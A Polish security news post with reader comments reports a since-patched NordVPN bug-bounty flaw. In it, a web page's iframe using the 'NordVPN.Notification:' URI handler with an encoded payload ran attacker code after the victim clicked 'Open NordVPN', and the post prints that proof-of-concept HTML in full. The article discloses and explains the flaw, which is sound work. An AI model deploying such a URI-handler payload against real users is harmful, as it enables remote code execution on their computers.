NordVPN – wykonanie kodu na komputerze ofiary. Wystarczyło wejść na zainfekowaną stronę i w popupie potwierdzić: „Open NordVPN”

26 stycznia 2021, 22:33 | W biegu | komentarzy 10
: oglądaj sekurakowe live-streamy o bezpieczeństwie IT.

Ciekawa podatność zgłoszona w ramach programu bug bounty. Badacz odkrył ze wystarczyło na jakiejś stronie zamieścić takiego iframe:

<!– exploit.html –> <!DOCTYPE html> <html lang=”en”> <head> <meta charset=”UTF-8″> <meta name=”viewport” content=”width=device-width, initial-scale=1.0″> <title>Exploit</title> </head> <body> <iframe src=”NordVPN.Notification:UAAAAB+LCAAAAAAABAANy0EKgCAQBdC7/LV0AHdC0K5WHWAQi4FpFB2hkO5eb/8Glpp7gQcc1mx8cCTjrEFJHuPYZjKC1y7iEOrZr6TW4Ae2knSv8tdIEqd0J7zvBy7afohQAAAA”></iframe> </body> </html>

Jeśli ofiara weszła na stronę, miała prezentowane dość niewinne okno z prośbą o potwierdzenie akcji 'Open NordVPN'. Jeśli ta opcja została wybrana następowało wykonanie ustalonego przez atakującego kodu:

Podatność została załatana, a badaczowi przyznano (naszym zdaniem) dość skromną nagrodę $500.

–ms

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

  1. Userka

    NordVPN można uruchomić sobie w kliencie na routerze, co ma swoje zalety jak i wady. Wtedy cały ruch leci przez VPN i nie potrzebujemy aplikacji.

    Odpowiedz
    • Mateusz

      A wady to jakie ?

      Odpowiedz
      • PanAnonimowy

        Blokada przez wiele serwisów w dostępie do usługi, m. in. Netflix, Hbo

        Odpowiedz
  2. Paweł

    Nie musi iść cały, może wybrany…

    Odpowiedz
  3. Odmiana przez przypadki

    Cześć! Bardzo cenię Wasze artykuły, ale jednej rzeczy nie zdzierżam! ;-(

    Błędnej formy biernika.

    Nie mówi się „zamieścić takiego iframe”, tylko „zamieścić taki iframe”. Bo tu musi być biernik, nie dopełniacz.

    Zamieścić kogo? co? – np: taki iframe, naukowy artykuł, drobne ogłoszenie, artystyczny portret.

    Żle: „zamieścić takiego iframe; „zamieścić naukowego artykuła”; „zamieścić drobnego ogłoszenia”; „zamieścić artystycznego portreta”.

    Odpowiedz
    • Krzysiek

      „Zamieścić takiego iframe’a.”

      Odpowiedz
      • Odmiana przez przypadki

        Tę (błędną) formę zacytowałem z artykułu: „zamieścić takiego iframe”.

        Odpowiedz
  4. Janek

    A jakie ma wady ?

    Odpowiedz
  5. Adam

    Nordvpn wywodzi się z firmy, która miała darmowego vpna sprzedającego dane swoich użytkowników. Fajnie całe „śledztwo” opowiadał pewien Pan z konkurencyjnej stronie o bezpieczeństwie kilka miesięcy na webinarze. 500$ to żart za taką podatność i raczej nie pokazuje jak dbają o bezpieczeństwo swoich klientów :/

    Odpowiedz
  6. Death121

    Śmiech w języku openvpn.

    Odpowiedz

Odpowiedz na Adam